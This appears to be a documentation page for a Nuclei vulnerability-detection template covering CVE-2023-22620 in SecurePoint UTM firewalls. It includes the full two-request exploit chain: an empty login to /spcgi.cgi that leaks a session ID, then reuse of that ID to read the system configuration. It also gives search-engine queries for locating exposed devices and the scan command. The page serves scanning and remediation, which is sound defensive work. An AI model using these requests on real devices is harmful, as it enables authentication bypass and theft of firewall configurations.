Skip to content
Nuclei Templates

SecurePoint UTM 12.x Session ID Leak

ID: CVE-2023-22620

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint

Description

Section titled “Description”

An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall’s endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device’s authentication and get access to the administrative interface.

YAML Source

Section titled “YAML Source”
id: CVE-2023-22620


info:
  name: SecurePoint UTM 12.x Session ID Leak
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user.
  remediation: Upgrade to version 12.2.5.1 or newer
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22620
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt
    - https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/
    - https://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html
    - https://rcesecurity.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-22620
    cwe-id: CWE-863
    epss-score: 0.03698
    epss-percentile: 0.91758
    cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: securepoint
    product: unified_threat_management
    shodan-query:
      - title:"Securepoint UTM"
      - http.title:"securepoint utm"
    fofa-query: title="securepoint utm"
    google-query: intitle:"securepoint utm"
  tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint


http:
  - raw:
      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8


        {"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}
      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8


        {"module":"system","command":["config","get"],"sessionid":"{{session}}"}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"status":"OK"'


      - type: word
        part: header_2
        words:
          - 'application/json'


    extractors:
      - type: regex
        name: session
        group: 1
        regex:
          - '"sessionid": "([a-z0-9]+)"'
        internal: true
# digest: 4b0a00483046022100a0112c4fe1db0850b29c6a6c3d98375553df51e8dec25badb9f6a20ea31545be022100efa0edb5b5cb27ff825cc6e08c9f5dfdae9c33628e5837e911af8ff2155adc48:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22620.yaml"

View on Github